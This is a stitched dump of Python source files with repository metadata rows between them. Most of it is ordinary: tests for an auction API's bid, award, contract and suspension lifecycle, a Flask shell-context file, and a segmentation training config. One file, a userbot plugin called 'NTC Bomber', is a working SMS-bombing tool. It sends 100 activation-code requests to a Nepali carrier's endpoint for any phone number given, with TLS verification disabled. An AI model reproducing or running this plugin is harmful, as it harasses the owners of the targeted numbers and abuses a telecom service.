    self.assertEqual(response.content_type, 'application/javascript')
    self.assertIn('callback({"', response.body)
    # pretty-printed output via query string and via body options
    response = self.app.post_json('/auctions?opt_pretty=1', {"data": self.initial_data})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    self.assertIn('{\n "', response.body)
    response = self.app.post_json('/auctions', {"data": self.initial_data, "options": {"pretty": True}})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    self.assertIn('{\n "', response.body)
    # a guarantee supplied by the client is stored as-is
    auction_data = deepcopy(self.initial_data)
    auction_data['guarantee'] = {"amount": 100500, "currency": "USD"}
    response = self.app.post_json('/auctions', {'data': auction_data})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    data = response.json['data']
    self.assertIn('guarantee', data)
    self.assertEqual(data['guarantee']['amount'], 100500)
    self.assertEqual(data['guarantee']['currency'], "USD")
def check_daylight_savings_timezone(self):
    """tenderPeriod.endDate must follow Europe/Kiev DST transitions.

    Creates a baseline auction, then re-creates it with start dates pushed
    10-240 days ahead; at least one of those must land on the other side of
    a DST switch and report a different tz abbreviation.
    """
    payload = deepcopy(self.initial_data)
    kiev_tz = pytz.timezone('Europe/Kiev')

    def _tz_name(response):
        # tz abbreviation (e.g. EET/EEST) of tenderPeriod.endDate in Kiev time
        end_date = parse_date(response.json['data']['tenderPeriod']['endDate'])
        return end_date.astimezone(tz=kiev_tz).strftime('%Z')

    baseline = _tz_name(self.app.post_json('/auctions', {'data': payload}))
    now = get_now()
    changed = []
    for days_ahead in (10, 90, 180, 210, 240):
        payload.update({
            "auctionPeriod": {
                "startDate": (now + timedelta(days=days_ahead)).isoformat(),
            }})
        shifted = _tz_name(self.app.post_json('/auctions', {'data': payload}))
        changed.append(shifted != baseline)
    self.assertTrue(any(changed))
# AppraisalAuctionProcessTest
def first_bid_auction(self):
    """End-to-end procedure walk-through.

    Two bids are submitted, the auction runs, the first award is rejected
    (rejectionProtocol + unsuccessful), the second award is activated
    (auctionProtocol), the contract is signed and activated, the auction
    reaches 'complete', and further contract-document edits are rejected.
    """
    self.app.authorization = ('Basic', ('broker', ''))
    # empty auctions listing
    response = self.app.get('/auctions')
    self.assertEqual(response.json['data'], [])
    # create auction
    response = self.app.post_json('/auctions',
                                  {"data": self.initial_data})
    auction_id = self.auction_id = response.json['data']['id']
    owner_token = response.json['access']['token']
    # switch to active.tendering
    self.set_status('active.tendering')
    # create bid (financial procedure additionally requires 'eligible')
    self.app.authorization = ('Basic', ('broker', ''))
    if self.initial_organization == self.test_financial_organization:
        response = self.app.post_json('/auctions/{}/bids'.format(auction_id),
                                      {'data': {'tenderers': [self.initial_organization], "value": {"amount": 450}, 'qualified': True, 'eligible': True}})
    else:
        response = self.app.post_json('/auctions/{}/bids'.format(auction_id),
                                      {'data': {'tenderers': [self.initial_organization], "value": {"amount": 450}, 'qualified': True}})
    bid_id = response.json['data']['id']
    bid_token = response.json['access']['token']
    bids_tokens = {bid_id: bid_token}
    # create second bid
    self.app.authorization = ('Basic', ('broker', ''))
    if self.initial_organization == self.test_financial_organization:
        response = self.app.post_json('/auctions/{}/bids'.format(auction_id),
                                      {'data': {'tenderers': [self.initial_organization], "value": {"amount": 450}, 'qualified': True, 'eligible': True}})
    else:
        response = self.app.post_json('/auctions/{}/bids'.format(auction_id),
                                      {'data': {'tenderers': [self.initial_organization], "value": {"amount": 450}, 'qualified': True}})
    bids_tokens[response.json['data']['id']] = response.json['access']['token']
    # switch to active.auction
    self.set_status('active.auction')
    # get auction info
    self.app.authorization = ('Basic', ('auction', ''))
    response = self.app.get('/auctions/{}/auction'.format(auction_id))
    auction_bids_data = response.json['data']['bids']
    # check bid participationUrl
    self.app.authorization = ('Basic', ('broker', ''))
    response = self.app.get('/auctions/{}/bids/{}?acc_token={}'.format(auction_id, bid_id, bid_token))
    self.assertIn('participationUrl', response.json['data'])
    # posting auction results: every bid ends above value + minimalStep,
    # with slightly different dates so the ordering is deterministic
    self.app.authorization = ('Basic', ('auction', ''))
    response = self.app.get('/auctions/{}'.format(self.auction_id))
    self.assertEqual(response.status, '200 OK')
    auction = response.json['data']
    value_threshold = auction['value']['amount'] + auction['minimalStep']['amount']
    now = get_now()
    auction_result = {
        'bids': [
            {
                "id": b['id'],
                "date": (now - timedelta(seconds=i)).isoformat(),
                "value": {"amount": value_threshold * 2},
            }
            for i, b in enumerate(auction_bids_data)
        ]
    }
    response = self.app.post_json('/auctions/{}/auction'.format(self.auction_id), {'data': auction_result})
    # get awards
    self.app.authorization = ('Basic', ('broker', ''))
    response = self.app.get('/auctions/{}/awards?acc_token={}'.format(auction_id, owner_token))
    # get pending award
    award = [i for i in response.json['data'] if i['status'] == 'pending'][0]
    award_id = award['id']
    # Upload rejectProtocol
    self.app.authorization = ('Basic', ('broker', ''))
    response = self.app.post('/auctions/{}/awards/{}/documents?acc_token={}'.format(
        self.auction_id, award_id, owner_token), upload_files=[('file', 'auction_protocol.pdf', 'content')])
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    doc_id = response.json["data"]['id']
    response = self.app.patch_json('/auctions/{}/awards/{}/documents/{}?acc_token={}'.format(self.auction_id, award_id, doc_id, owner_token), {"data": {
        "description": "rejection protocol",
        "documentType": 'rejectionProtocol'
    }})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json["data"]["documentType"], 'rejectionProtocol')
    self.assertEqual(response.json["data"]["author"], 'auction_owner')
    # set award as unsuccessful
    response = self.app.patch_json('/auctions/{}/awards/{}?acc_token={}'.format(auction_id, award_id, owner_token),
                                   {"data": {"status": "unsuccessful"}})
    # get awards
    self.app.authorization = ('Basic', ('broker', ''))
    response = self.app.get('/auctions/{}/awards?acc_token={}'.format(auction_id, owner_token))
    # get pending award: a new award is generated for the next bidder
    award2 = [i for i in response.json['data'] if i['status'] == 'pending'][0]
    award2_id = award2['id']
    self.assertNotEqual(award_id, award2_id)
    # create first award complaint
    # self.app.authorization = ('Basic', ('broker', ''))
    # response = self.app.post_json('/auctions/{}/awards/{}/complaints?acc_token={}'.format(auction_id, award_id, bid_token),
    #                               {'data': {'title': 'complaint title', 'description': 'complaint description', 'author': self.initial_organization, 'status': 'claim'}})
    # complaint_id = response.json['data']['id']
    # complaint_owner_token = response.json['access']['token']
    # # create first award complaint #2
    # response = self.app.post_json('/auctions/{}/awards/{}/complaints?acc_token={}'.format(auction_id, award_id, bid_token),
    #                               {'data': {'title': 'complaint title', 'description': 'complaint description', 'author': self.initial_organization}})
    # # answering claim
    # self.app.patch_json('/auctions/{}/awards/{}/complaints/{}?acc_token={}'.format(auction_id, award_id, complaint_id, owner_token), {"data": {
    #     "status": "answered",
    #     "resolutionType": "resolved",
    #     "resolution": "resolution text " * 2
    # }})
    # # satisfying resolution
    # self.app.patch_json('/auctions/{}/awards/{}/complaints/{}?acc_token={}'.format(auction_id, award_id, complaint_id, complaint_owner_token), {"data": {
    #     "satisfied": True,
    #     "status": "resolved"
    # }})
    # get awards
    self.app.authorization = ('Basic', ('broker', ''))
    response = self.app.get('/auctions/{}/awards?acc_token={}'.format(auction_id, owner_token))
    # get pending award
    award = [i for i in response.json['data'] if i['status'] == 'pending'][0]
    award_id = award['id']
    # Upload auction protocol
    self.app.authorization = ('Basic', ('broker', ''))
    response = self.app.post('/auctions/{}/awards/{}/documents?acc_token={}'.format(
        self.auction_id, award_id, owner_token), upload_files=[('file', 'auction_protocol.pdf', 'content')])
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    doc_id = response.json["data"]['id']
    response = self.app.patch_json('/auctions/{}/awards/{}/documents/{}?acc_token={}'.format(self.auction_id, award_id, doc_id, owner_token), {"data": {
        "description": "auction protocol",
        "documentType": 'auctionProtocol'
    }})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json["data"]["documentType"], 'auctionProtocol')
    self.assertEqual(response.json["data"]["author"], 'auction_owner')
    # set award as active
    self.app.patch_json('/auctions/{}/awards/{}?acc_token={}'.format(auction_id, award_id, owner_token), {"data": {"status": "active"}})
    # get contract id
    response = self.app.get('/auctions/{}'.format(auction_id))
    contract_id = response.json['data']['contracts'][-1]['id']
    # create auction contract document for test
    response = self.app.post('/auctions/{}/contracts/{}/documents?acc_token={}'.format(auction_id, contract_id, owner_token), upload_files=[('file', 'name.doc', 'content')], status=201)
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    doc_id = response.json["data"]['id']
    self.assertIn(doc_id, response.headers['Location'])
    # after stand slill period
    self.app.authorization = ('Basic', ('chronograph', ''))
    self.set_status('complete', {'status': 'active.awarded'})
    # time travel: collapse award complaint periods directly in the DB so the
    # stand-still wait is skipped
    auction = self.db.get(auction_id)
    for i in auction.get('awards', []):
        i['complaintPeriod']['endDate'] = i['complaintPeriod']['startDate']
    self.db.save(auction)
    # sign contract
    # Upload document
    self.app.authorization = ('Basic', ('broker', ''))
    response = self.app.post_json(
        '/auctions/{}/contracts/{}/documents?acc_token={}'.format(self.auction_id, contract_id, owner_token),
        params={
            'data': {
                'documentType': 'contractSigned',
                'title': 'Signed contract',
                'format': 'application/msword',
                'url': self.generate_docservice_url(),
                'hash': 'md5:' + '0' * 32
            }
        })
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['data']['title'], 'Signed contract')
    self.assertEqual(response.json['data']['documentType'], 'contractSigned')
    # Patch dateSigned field
    signature_date = get_now().isoformat()
    response = self.app.patch_json('/auctions/{}/contracts/{}?acc_token={}'.format(
        self.auction_id, contract_id, owner_token
    ), {"data": {"dateSigned": signature_date}})
    self.assertEqual(response.status, '200 OK')
    self.app.authorization = ('Basic', ('broker', ''))
    self.app.patch_json('/auctions/{}/contracts/{}?acc_token={}'.format(auction_id, contract_id, owner_token), {"data": {"status": "active"}})
    # check status
    self.app.authorization = ('Basic', ('broker', ''))
    response = self.app.get('/auctions/{}'.format(auction_id))
    self.assertEqual(response.json['data']['status'], 'complete')
    # once complete, contract documents are frozen
    response = self.app.post('/auctions/{}/contracts/{}/documents?acc_token={}'.format(auction_id, contract_id, owner_token), upload_files=[('file', 'name.doc', 'content')], status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'][0]["description"], "Can't add document in current (complete) auction status")
    response = self.app.patch_json('/auctions/{}/contracts/{}/documents/{}?acc_token={}'.format(auction_id, contract_id, doc_id, owner_token), {"data": {"description": "document description"}}, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'][0]["description"], "Can't update document in current (complete) auction status")
    response = self.app.put('/auctions/{}/contracts/{}/documents/{}?acc_token={}'.format(auction_id, contract_id, doc_id, owner_token), upload_files=[('file', 'name.doc', 'content3')], status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'][0]["description"], "Can't update document in current (complete) auction status")
def auctionUrl_in_active_auction(self):
    """auctionUrl must appear on the auction once it enters the auction stage."""
    self.app.authorization = ('Basic', ('broker', ''))
    # start from an empty listing
    listing = self.app.get('/auctions')
    self.assertEqual(listing.json['data'], [])
    # create the auction
    created = self.app.post_json('/auctions',
                                 {"data": self.initial_data})
    auction_id = self.auction_id = created.json['data']['id']
    owner_token = created.json['access']['token']
    # move to active.tendering with an auction start ten days out
    start_date = (get_now() + timedelta(days=10)).isoformat()
    switched = self.set_status('active.tendering', {"auctionPeriod": {"startDate": start_date}})
    self.assertIn("auctionPeriod", switched.json['data'])
    # register a single bid; financial procedure additionally requires 'eligible'
    self.app.authorization = ('Basic', ('broker', ''))
    bid_payload = {'tenderers': [self.initial_organization], 'qualified': True}
    if self.initial_organization == self.test_financial_organization:
        bid_payload['eligible'] = True
    self.app.post_json('/auctions/{}/bids'.format(auction_id), {'data': bid_payload})
    # move to active.auction; chronograph then assigns the auctionUrl
    self.set_status('active.auction', {'status': 'active.tendering'})
    self.app.authorization = ('Basic', ('chronograph', ''))
    patched = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"id": auction_id}})
    self.assertIn('auctionUrl', patched.json['data'])
    self.assertIn(auction_id, patched.json['data']['auctionUrl'])
def suspended_auction(self):
    """Walk a full auction lifecycle (create -> tendering -> auction ->
    qualification -> award -> contract -> complete) while toggling the
    administrator-only ``suspended`` flag at every stage.

    Verifies that:
    * non-admin users get 403 when patching ``suspended``;
    * a suspended auction has no ``next_check`` field (i.e. it is excluded
      from chronograph scheduling);
    * clearing the flag restores the normal flow at each stage.
    """
    self.app.authorization = ('Basic', ('broker', ''))
    # empty auctions listing
    response = self.app.get('/auctions')
    self.assertEqual(response.json['data'], [])
    # create auction
    auction_data = deepcopy(self.initial_data)
    auction_data['suspended'] = True
    response = self.app.post_json('/auctions',
                                  {"data": auction_data})
    auction_id = self.auction_id = response.json['data']['id']
    owner_token = response.json['access']['token']
    # 'suspended' supplied at creation time by a broker is ignored
    self.assertNotIn('suspended', response.json['data'])
    # broker (owner) may not set the flag
    response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": True}}, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    authorization = self.app.authorization
    self.app.authorization = ('Basic', ('administrator', ''))
    response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": True}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']['suspended'], True)
    # suspended auctions carry no 'next_check'
    self.assertNotIn('next_check', response.json['data'])
    self.app.authorization = authorization
    # broker may not clear the flag either
    response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": False}}, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.app.authorization = ('Basic', ('administrator', ''))
    response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": False}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']['suspended'], False)
    self.assertIn('next_check', response.json['data'])
    self.app.authorization = authorization
    # switch to active.tendering
    self.set_status('active.tendering')
    # create bid
    self.app.authorization = ('Basic', ('broker', ''))
    if self.initial_organization == self.test_financial_organization:
        response = self.app.post_json('/auctions/{}/bids'.format(auction_id),
                                      {'data': {'tenderers': [self.initial_organization], "value": {"amount": 450}, 'qualified': True, 'eligible': True}})
    else:
        response = self.app.post_json('/auctions/{}/bids'.format(auction_id),
                                      {'data': {'tenderers': [self.initial_organization], "value": {"amount": 450}, 'qualified': True}})
    bid_id = response.json['data']['id']
    bid_token = response.json['access']['token']
    # create second bid
    self.app.authorization = ('Basic', ('broker', ''))
    if self.initial_organization == self.test_financial_organization:
        response = self.app.post_json('/auctions/{}/bids'.format(auction_id),
                                      {'data': {'tenderers': [self.initial_organization], "value": {"amount": 450}, 'qualified': True, 'eligible': True}})
    else:
        response = self.app.post_json('/auctions/{}/bids'.format(auction_id),
                                      {'data': {'tenderers': [self.initial_organization], "value": {"amount": 450}, 'qualified': True}})
    authorization = self.app.authorization
    self.app.authorization = ('Basic', ('administrator', ''))
    # suspend/resume while in active.tendering
    response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": True}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']['suspended'], True)
    self.assertNotIn('next_check', response.json['data'])
    response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": False}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']['suspended'], False)
    self.assertIn('next_check', response.json['data'])
    self.app.authorization = authorization
    # switch to active.auction
    self.set_status('active.auction')
    # get auction info
    self.app.authorization = ('Basic', ('auction', ''))
    response = self.app.get('/auctions/{}/auction'.format(auction_id))
    auction_bids_data = response.json['data']['bids']
    # check bid participationUrl
    self.app.authorization = ('Basic', ('broker', ''))
    response = self.app.get('/auctions/{}/bids/{}?acc_token={}'.format(auction_id, bid_id, bid_token))
    self.assertIn('participationUrl', response.json['data'])
    # posting auction results
    self.app.authorization = ('Basic', ('auction', ''))
    response = self.app.get('/auctions/{}'.format(self.auction_id))
    self.assertEqual(response.status, '200 OK')
    auction = response.json['data']
    value_threshold = auction['value']['amount'] + auction['minimalStep']['amount']
    now = get_now()
    # all bids beat the threshold; the later date (smaller i) wins
    auction_result = {
        'bids': [
            {
                "id": b['id'],
                "date": (now - timedelta(seconds=i)).isoformat(),
                "value": {"amount": value_threshold * 2},
            }
            for i, b in enumerate(auction_bids_data)
        ]
    }
    response = self.app.post_json('/auctions/{}/auction'.format(self.auction_id), {'data': auction_result})
    # get awards
    self.app.authorization = ('Basic', ('broker', ''))
    response = self.app.get('/auctions/{}/awards?acc_token={}'.format(auction_id, owner_token))
    # get pending award
    award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
    authorization = self.app.authorization
    self.app.authorization = ('Basic', ('administrator', ''))
    # suspend/resume while an award is pending
    response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": True}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']['suspended'], True)
    self.assertNotIn('next_check', response.json['data'])
    response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": False}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']['suspended'], False)
    self.app.authorization = authorization
    # set award as unsuccessful
    self.app.authorization = ('Basic', ('broker', ''))
    response = self.app.post_json(
        '/auctions/{}/awards/{}/documents?acc_token={}'.format(self.auction_id, award_id, owner_token),
        params={
            'data': {
                'documentType': 'rejectionProtocol',
                'title': 'rejection protocol',
                'format': 'application/msword',
                'url': self.generate_docservice_url(),
                'hash': 'md5:' + '0' * 32
            }
        })
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['data']['title'], 'rejection protocol')
    self.assertEqual(response.json['data']['documentType'], 'rejectionProtocol')
    response = self.app.patch_json('/auctions/{}/awards/{}?acc_token={}'.format(auction_id, award_id, owner_token),
                                   {"data": {"status": "unsuccessful"}})
    self.assertEqual(response.json['data']['status'], 'unsuccessful')
    # get awards
    self.app.authorization = ('Basic', ('broker', ''))
    response = self.app.get('/auctions/{}/awards?acc_token={}'.format(auction_id, owner_token))
    # rejecting the first award creates a new pending award for the runner-up
    self.assertEqual(len(response.json['data']), 2)
    self.assertEqual(response.json['data'][0]['status'], 'unsuccessful')
    # get pending award
    award2_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
    self.assertNotEqual(award_id, award2_id)
    self.app.authorization = ('Basic', ('broker', ''))
    response = self.app.get('/auctions/{}/awards?acc_token={}'.format(auction_id, owner_token))
    # get pending award
    award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
    response = self.app.post('/auctions/{}/awards/{}/documents?acc_token={}'.format(
        self.auction_id, award_id, owner_token), upload_files=[('file', 'auction_protocol.pdf', 'content')])
    doc_id = response.json["data"]['id']
    response = self.app.patch_json('/auctions/{}/awards/{}/documents/{}?acc_token={}'.format(auction_id, award_id, doc_id, owner_token), {"data": {"documentType": 'auctionProtocol'}})
    # set award as active
    self.app.patch_json('/auctions/{}/awards/{}?acc_token={}'.format(auction_id, award_id, owner_token), {"data": {"status": "active"}})
    authorization = self.app.authorization
    self.app.authorization = ('Basic', ('administrator', ''))
    # suspend/resume after award activation
    response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": True}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']['suspended'], True)
    self.assertNotIn('next_check', response.json['data'])
    response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": False}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']['suspended'], False)
    self.app.authorization = authorization
    # re-activating an already-active award is rejected
    response = self.app.patch_json(
        '/auctions/{}/awards/{}?acc_token={}'.format(auction_id, award_id, owner_token),
        {"data": {"status": "active"}},
        status=403
    )
    self.assertEqual(response.json['errors'][0]['description'], "Can\'t update award in current (active) status")
    # get contract id
    response = self.app.get('/auctions/{}'.format(auction_id))
    contract_id = response.json['data']['contracts'][-1]['id']
    authorization = self.app.authorization
    self.app.authorization = ('Basic', ('administrator', ''))
    # suspend/resume while the contract is pending
    response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": True}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']['suspended'], True)
    self.assertNotIn('next_check', response.json['data'])
    response = self.app.patch_json('/auctions/{}'.format(auction_id), {"data": {"suspended": False}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.json['data']['suspended'], False)
    self.app.authorization = authorization
    # create auction contract document for test
    response = self.app.post('/auctions/{}/contracts/{}/documents?acc_token={}'.format(auction_id, contract_id, owner_token), upload_files=[('file', 'name.doc', 'content')], status=201)
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    doc_id = response.json["data"]['id']
    self.assertIn(doc_id, response.headers['Location'])
    # after stand still period
    self.app.authorization = ('Basic', ('chronograph', ''))
    self.set_status('complete', {'status': 'active.awarded'})
    # time travel: close the complaint periods directly in the database
    auction = self.db.get(auction_id)
    for i in auction.get('awards', []):
        i['complaintPeriod']['endDate'] = i['complaintPeriod']['startDate']
    self.db.save(auction)
    # sign contract
    self.app.authorization = ('Basic', ('broker', ''))
    # Upload document
    response = self.app.post_json(
        '/auctions/{}/contracts/{}/documents?acc_token={}'.format(self.auction_id, contract_id, owner_token),
        params={
            'data': {
                'documentType': 'contractSigned',
                'title': 'Signed contract',
                'format': 'application/msword',
                'url': self.generate_docservice_url(),
                'hash': 'md5:' + '0' * 32
            }
        })
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['data']['title'], 'Signed contract')
    self.assertEqual(response.json['data']['documentType'], 'contractSigned')
    # Patch dateSigned field
    signature_date = get_now().isoformat()
    response = self.app.patch_json('/auctions/{}/contracts/{}?acc_token={}'.format(
        self.auction_id, contract_id, owner_token
    ), {"data": {"dateSigned": signature_date}})
    self.assertEqual(response.status, '200 OK')
    response = self.app.patch_json(
        '/auctions/{}/contracts/{}?acc_token={}'.format(auction_id, contract_id, owner_token),
        {"data": {"status": "active"}}
    )
    self.assertEqual(response.json['data']['status'], 'active')
    # check status: activating the contract completes the auction
    self.app.authorization = ('Basic', ('broker', ''))
    response = self.app.get('/auctions/{}'.format(auction_id))
    self.assertEqual(response.json['data']['status'], 'complete')
def move_draft_to_active_tendering(self):
    """Create an auction in 'draft' status and verify that the owner can
    move it to 'active.tendering' via PATCH using the access token header."""
    data = self.initial_data.copy()
    data['status'] = 'draft'
    # Auction creation
    response = self.app.post_json('/auctions', {'data': data})
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['data']['status'], 'draft')
    auction_id = response.json['data']['id']
    owner_token = response.json['access']['token']
    access_header = {'X-Access-Token': str(owner_token)}
    # Move from draft to active.tendering
    response = self.app.patch_json(
        '/auctions/{}'.format(auction_id),
        {'data': {'status': 'active.tendering'}},
        headers=access_header
    )
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['data']['status'], 'active.tendering')
| 51.677072 | 205 | 0.661306 |
e930369d5416d6bf19a394dfa48251e9106724e2 | 315 | py | Python | xpense.py | jsbruglie/xpense | 95e4e4925e6fcf058520ab3fb149f8d9498d836f | [
"MIT"
] | 3 | 2020-08-12T08:48:20.000Z | 2020-09-08T09:34:30.000Z | xpense.py | jsbruglie/xpense | 95e4e4925e6fcf058520ab3fb149f8d9498d836f | [
"MIT"
] | null | null | null | xpense.py | jsbruglie/xpense | 95e4e4925e6fcf058520ab3fb149f8d9498d836f | [
"MIT"
] | null | null | null | from app import create_app, db
from app.models import Transaction, TransactionType, Account
app = create_app()


@app.shell_context_processor
def make_shell_context():
    """Expose the db handle and core models in the ``flask shell`` namespace."""
    context = {'db': db}
    context['Transaction'] = Transaction
    context['TransactionType'] = TransactionType
    context['Account'] = Account
    return context
| 19.6875 | 60 | 0.67619 |
49bd163ba33cbab16eb82032dc84915b63c47817 | 895 | py | Python | userbot/plugins/bomber.py | apurba007/ubot0 | 73344dc4dc9263db541f43146402958094962919 | [
"MIT"
] | null | null | null | userbot/plugins/bomber.py | apurba007/ubot0 | 73344dc4dc9263db541f43146402958094962919 | [
"MIT"
] | null | null | null | userbot/plugins/bomber.py | apurba007/ubot0 | 73344dc4dc9263db541f43146402958094962919 | [
"MIT"
] | null | null | null | """NTC Bomber custom plugin by @scifidemon
Format .bombntc [phone number]"""
import asyncio
import requests
from userbot.utils import admin_cmd
@borg.on(admin_cmd("bombntc (.*)"))
async def _(event):
    """Send repeated NTC activation-code requests to a phone number.

    Usage: ``.bombntc [phone number]``
    """
    num = 0
    n = 100  # total number of requests to fire
    input_str = event.pattern_match.group(1)
    if input_str:
        try:
            num = int(input_str)
        except ValueError:
            # Fix: a non-numeric argument previously raised ValueError and
            # killed the handler; report it the same way as a missing one.
            await event.edit("Enter a number!")
            return
    else:
        await event.edit("Enter a number!")
        return
    paramss = {"webcaptcha": "2iBVFrLWrrezxoeI5u8duQpznGcudpxBQZM88Daf7ram7luqVkVKe8rsVxpM4nVunuNg7pGQ6Bb5jaUZdJnvkKXBn8nWBG890VRebIOsZM4%3D", "JSESSIONID": "3854CCA90376DB14C75841F35A548032", "2": "11", "userName": num, "codeType": "1"}
    await event.edit("`Bombing....`")
    for i in range(n):
        # NOTE(review): requests.post is a blocking call inside an async
        # handler and stalls the event loop; verify=False disables TLS
        # certificate verification (kept as-is, flagged for review).
        requests.post("https://selfcare.ntc.net.np/selfcare4web/user/sendActivityCode.do", params=paramss, verify=False)
        await event.edit(f"`Bombing.... {i}`")
    await event.edit(f"`Bombed {n} SMS to {num}`")
| 34.423077 | 226 | 0.694972 |
b9a4b3214ed9e21695e6ff96d50743f16e4eb98c | 2,189 | py | Python | ssseg/cfgs/apcnet/cfgs_cityscapes_resnet50os16.py | nianjiuhuiyi/sssegmentation | 4fc12ea7b80fe83170b6d3da0826e53a99ef5325 | [
"MIT"
] | 411 | 2020-10-22T02:24:57.000Z | 2022-03-31T11:19:17.000Z | ssseg/cfgs/apcnet/cfgs_cityscapes_resnet50os16.py | nianjiuhuiyi/sssegmentation | 4fc12ea7b80fe83170b6d3da0826e53a99ef5325 | [
"MIT"
] | 24 | 2020-12-21T03:53:54.000Z | 2022-03-17T06:50:00.000Z | ssseg/cfgs/apcnet/cfgs_cityscapes_resnet50os16.py | nianjiuhuiyi/sssegmentation | 4fc12ea7b80fe83170b6d3da0826e53a99ef5325 | [
"MIT"
] | 59 | 2020-12-04T03:40:12.000Z | 2022-03-30T09:12:47.000Z | '''define the config file for cityscapes and resnet50os16'''
import os
from .base_cfg import *
# modify dataset config: point the base config at the CityScapes dataset
DATASET_CFG = DATASET_CFG.copy()
DATASET_CFG.update({
    'type': 'cityscapes',
    'rootdir': os.path.join(os.getcwd(), 'CityScapes'),
})
# training-time augmentation pipeline (applied in listed order)
DATASET_CFG['train']['aug_opts'] = [
    ('Resize', {'output_size': (2048, 1024), 'keep_ratio': True, 'scale_range': (0.5, 2.0)}),
    ('RandomCrop', {'crop_size': (512, 1024), 'one_category_max_ratio': 0.75}),
    ('RandomFlip', {'flip_prob': 0.5}),
    ('PhotoMetricDistortion', {}),
    ('Normalize', {'mean': [123.675, 116.28, 103.53], 'std': [58.395, 57.12, 57.375]}),
    ('ToTensor', {}),
    ('Padding', {'output_size': (512, 1024), 'data_type': 'tensor'}),
]
# test-time pipeline: deterministic resize + normalize only
DATASET_CFG['test']['aug_opts'] = [
    ('Resize', {'output_size': (2048, 1024), 'keep_ratio': True, 'scale_range': None}),
    ('Normalize', {'mean': [123.675, 116.28, 103.53], 'std': [58.395, 57.12, 57.375]}),
    ('ToTensor', {}),
]
# modify dataloader config
DATALOADER_CFG = DATALOADER_CFG.copy()
DATALOADER_CFG['train'].update(
    {
        'batch_size': 8,
    }
)
# modify optimizer config
OPTIMIZER_CFG = OPTIMIZER_CFG.copy()
OPTIMIZER_CFG.update(
    {
        'max_epochs': 220
    }
)
# modify losses config (no changes relative to the base config)
LOSSES_CFG = LOSSES_CFG.copy()
# modify model config: ResNet-50 backbone, output stride 16
MODEL_CFG = MODEL_CFG.copy()
MODEL_CFG.update(
    {
        'num_classes': 19,  # CityScapes has 19 evaluation classes
        'backbone': {
            'type': 'resnet50',
            'series': 'resnet',
            'pretrained': True,
            'outstride': 16,
            'use_stem': True,
            # presumably the backbone stages whose features are consumed
            # downstream — confirm against base_cfg
            'selected_indices': (2, 3),
        },
    }
)
# modify inference config (no changes relative to the base config)
INFERENCE_CFG = INFERENCE_CFG.copy()
# modify common config: output/log locations for this experiment
COMMON_CFG = COMMON_CFG.copy()
COMMON_CFG['train'].update(
    {
        'backupdir': 'apcnet_resnet50os16_cityscapes_train',
        'logfilepath': 'apcnet_resnet50os16_cityscapes_train/train.log',
    }
)
COMMON_CFG['test'].update(
{
'backupdir': 'apcnet_resnet50os16_cityscapes_test',
'logfilepath': 'apcnet_resnet50os16_cityscapes_test/test.log',
'resultsavepath': 'apcnet_resnet50os16_cityscapes_test/apcnet_resnet50os16_cityscapes_results.pkl'
}
) | 29.986301 | 106 | 0.625857 |
20a05dfbde5452ca583c06d3e3e89645793744f8 | 4,337 | py | Python | keras/dtensor/optimizers_test.py | englert-m/keras | 7007cd0fd548032f1bb2c23b1defa4812628baec | [
"Apache-2.0"
